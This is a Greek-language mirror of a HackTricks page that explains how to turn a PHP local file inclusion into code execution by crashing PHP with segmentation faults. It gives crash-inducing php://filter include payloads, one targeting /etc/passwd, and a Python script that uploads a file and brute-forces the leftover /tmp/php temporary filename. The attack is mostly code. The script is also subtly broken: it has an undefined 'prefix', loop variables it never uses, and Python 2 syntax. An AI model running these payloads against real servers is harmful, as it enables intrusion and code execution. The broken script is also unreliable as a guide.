mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
84 lines
5.7 KiB
Markdown
84 lines
5.7 KiB
Markdown
# LFI2RCE μέσω Segmentation Fault
|
||
|
||
<details>
|
||
|
||
<summary><strong>Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||
|
||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF**, ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||
* **Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||
|
||
</details>
|
||
|
||
Σύμφωνα με τα άρθρα [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (δεύτερο μέρος) και [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), οι παρακάτω φορτίδες προκάλεσαν ένα segmentation fault στην PHP:
|
||
```php
|
||
// PHP 7.0
|
||
include("php://filter/string.strip_tags/resource=/etc/passwd");
|
||
|
||
// PHP 7.2
|
||
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
|
||
```
|
||
Θα πρέπει να γνωρίζετε ότι αν **στείλετε** ένα αίτημα **POST** που **περιέχει** ένα **αρχείο**, η PHP θα δημιουργήσει ένα **προσωρινό αρχείο στο `/tmp/php<κάτι>`** με το περιεχόμενο του αρχείου αυτού. Αυτό το αρχείο θα **διαγραφεί αυτόματα** μόλις επεξεργαστείται το αίτημα.
|
||
|
||
Αν βρείτε μια **LFI** και καταφέρετε να **ενεργοποιήσετε** ένα segmentation fault στην PHP, το **προσωρινό αρχείο δεν θα διαγραφεί ποτέ**. Επομένως, μπορείτε να το **αναζητήσετε** με την ευπάθεια του **LFI** μέχρι να το βρείτε και να εκτελέσετε αυθαίρετο κώδικα.
|
||
|
||
Μπορείτε να χρησιμοποιήσετε την εικόνα docker [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) για δοκιμές.
|
||
```python
|
||
# upload file with segmentation fault
|
||
import requests
|
||
url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
|
||
files = {'file': open('la.php','rb')}
|
||
response = requests.post(url, files=files)
|
||
|
||
|
||
# Search for the file (improve this with threads)
|
||
import requests
|
||
import string
|
||
import threading
|
||
|
||
charset = string.ascii_letters + string.digits
|
||
|
||
host = "127.0.0.1"
|
||
port = 80
|
||
base_url = "http://%s:%d" % (host, port)
|
||
|
||
|
||
def bruteforce(charset):
|
||
for i in charset:
|
||
for j in charset:
|
||
for k in charset:
|
||
for l in charset:
|
||
for m in charset:
|
||
for n in charset:
|
||
filename = prefix + i + j + k
|
||
url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
|
||
print url
|
||
response = requests.get(url)
|
||
if 'spyd3r' in response.content:
|
||
print "[+] Include success!"
|
||
return True
|
||
|
||
|
||
def main():
|
||
bruteforce(charset)
|
||
|
||
if __name__ == "__main__":
|
||
main()
|
||
```
|
||
<details>
|
||
|
||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||
|
||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||
|
||
</details>
|